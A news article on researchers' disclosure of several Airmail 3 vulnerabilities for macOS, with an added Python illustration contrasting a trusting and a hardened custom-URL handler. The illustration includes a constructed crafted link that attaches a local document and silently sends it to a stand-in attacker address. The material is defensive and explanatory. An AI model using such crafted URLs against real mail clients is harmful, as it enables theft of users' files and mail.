Airmail 3, a popular email client for macOS, ships with serious security vulnerabilities that could put users’ personal data at risk.
Researchers uncovered an exploit that allows attackers to steal users’ emails and attachments simply by convincing them to open a message. Here’s how it works.
Airmail 3 promises fast performance and “intuitive interaction.” It comes loaded with features, sports an attractive design, and supports all major email services. It’s no wonder Airmail 3 became so popular among macOS users.
But there’s something you should know before you rush off to download it.
Beware the Airmail 3 vulnerability
VerSprite researchers have discovered flaws in the way Airmail 3 handles URL requests, which attackers could use to steal personal data.
By sending a message with a specific URL request — one that secretly uses the “send mail” function of Airmail 3 — attackers can obtain a user’s emails and attachments before they have any idea what’s happening.
Other code could be embedded that instructs Airmail to attach other files to the outbound email, the researchers warn.
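The flaw described above is a classic custom-URL-scheme problem: a link inside a message is allowed to drive a sensitive action (compose, attach local files, send) without the user reviewing it. The following Python model, added here as an illustration and not code from Airmail or from VerSprite's research, contrasts a handler that honours every URL parameter with a hardened one that lets a URL pre-fill a draft only. The scheme name `mailclient`, the action `compose`, and the parameter names `to`, `subject`, `body`, `attach` and `send` are assumptions for the example, not Airmail's actual URL format; the crafted and benign URLs are constructed test inputs.

```python
"""Model of a mail-client custom URL handler: a trusting variant beside a hardened one.

Constructed illustration. The scheme, host and parameter names are assumptions,
not the real URL format of any shipping mail client.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlparse

SCHEME = "mailclient"        # assumed scheme name
COMPOSE_HOST = "compose"     # assumed action name
ALLOWED_PARAMS = {"to", "subject", "body"}   # what a URL may pre-fill in a draft
ADDRESS_RE = re.compile(r"^[^@\s<>]+@[^@\s<>]+\.[^@\s<>]+$")


class RejectedRequest(ValueError):
    """Raised by the hardened handler when a URL asks for something it must not do."""


@dataclass
class ComposeRequest:
    to: list[str]
    subject: str = ""
    body: str = ""
    attachments: list[str] = field(default_factory=list)
    send_immediately: bool = False


def parse_compose_trusting(url: str) -> ComposeRequest:
    """Weak handler: every parameter is honoured, including local file paths to
    attach and a flag that sends the message without ever showing it."""
    q = parse_qs(urlparse(url).query, keep_blank_values=True)
    return ComposeRequest(
        to=q.get("to", []),
        subject=q.get("subject", [""])[0],
        body=q.get("body", [""])[0],
        attachments=q.get("attach", []),              # attacker-chosen local paths
        send_immediately=q.get("send", ["0"])[0] == "1",
    )


def parse_compose_hardened(url: str) -> ComposeRequest:
    """Hardened handler: a URL may only pre-fill a draft that the user still has
    to review and send. Unknown parameters (file paths, send flags) are rejected."""
    p = urlparse(url)
    if p.scheme != SCHEME or p.netloc != COMPOSE_HOST or p.path not in ("", "/"):
        raise RejectedRequest(f"unsupported action: {url!r}")
    q = parse_qs(p.query, keep_blank_values=True)
    unexpected = set(q) - ALLOWED_PARAMS
    if unexpected:
        raise RejectedRequest(f"unsupported parameters: {sorted(unexpected)}")
    recipients = [a for a in q.get("to", []) if a]
    malformed = [a for a in recipients if not ADDRESS_RE.match(a)]
    if malformed:
        raise RejectedRequest(f"malformed recipient(s): {malformed}")
    return ComposeRequest(
        to=recipients,
        subject=q.get("subject", [""])[0],
        body=q.get("body", [""])[0],
        attachments=[],          # attachments are only ever added by the user in the UI
        send_immediately=False,  # a URL never sends; it only opens a draft
    )


def accepts(url: str) -> bool:
    """True if the hardened handler would open a draft for this URL."""
    try:
        parse_compose_hardened(url)
        return True
    except RejectedRequest:
        return False


# Constructed inputs: a crafted link that would exfiltrate a local file to an
# attacker-controlled address and send silently, and a benign pre-filled draft.
CRAFTED = (f"{SCHEME}://{COMPOSE_HOST}/?to=attacker%40example.net"
           "&subject=x&attach=%2FUsers%2Fvictim%2FDocuments%2Ftaxes.pdf&send=1")
BENIGN = f"{SCHEME}://{COMPOSE_HOST}/?to=friend%40example.org&subject=Hello"

if __name__ == "__main__":
    print("trusting handler :", parse_compose_trusting(CRAFTED))
    print("hardened handler :", "rejected" if not accepts(CRAFTED) else "accepted")
    print("benign draft     :", parse_compose_hardened(BENIGN))
```

The design point is that a URL arriving from untrusted content should be able to do no more than open a draft with a few text fields filled in; file system paths and anything that skips the user's review belong to the UI, never to the link.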
Another vulnerability allows attackers to request specific documents from the user account database. A third Airmail vulnerability lets attackers bypass the client’s HTML filters, so that embedded plugins are not identified as malicious.
A fourth allows an attack to take place as soon as the user opens an email; it does not require the user to click a link within the message. This exploit only worked about half the time, according to the researchers.
iOS users may be at risk
The researchers discovered these flaws in the macOS version of Airmail 3. It’s not clear if similar problems exist in the iOS version. VerSprite reported them all to Airmail’s developers. However, the researchers say no patches have been issued.
“I would avoid using Airmail 3 until this is fixed,” advises VerSprite researcher Fabius Watson.
Airmail told AppleInsider that an update to address these problems will arrive “probably today.” The developer also calls the potential attacks “very hypothetical” and insists no users have been affected.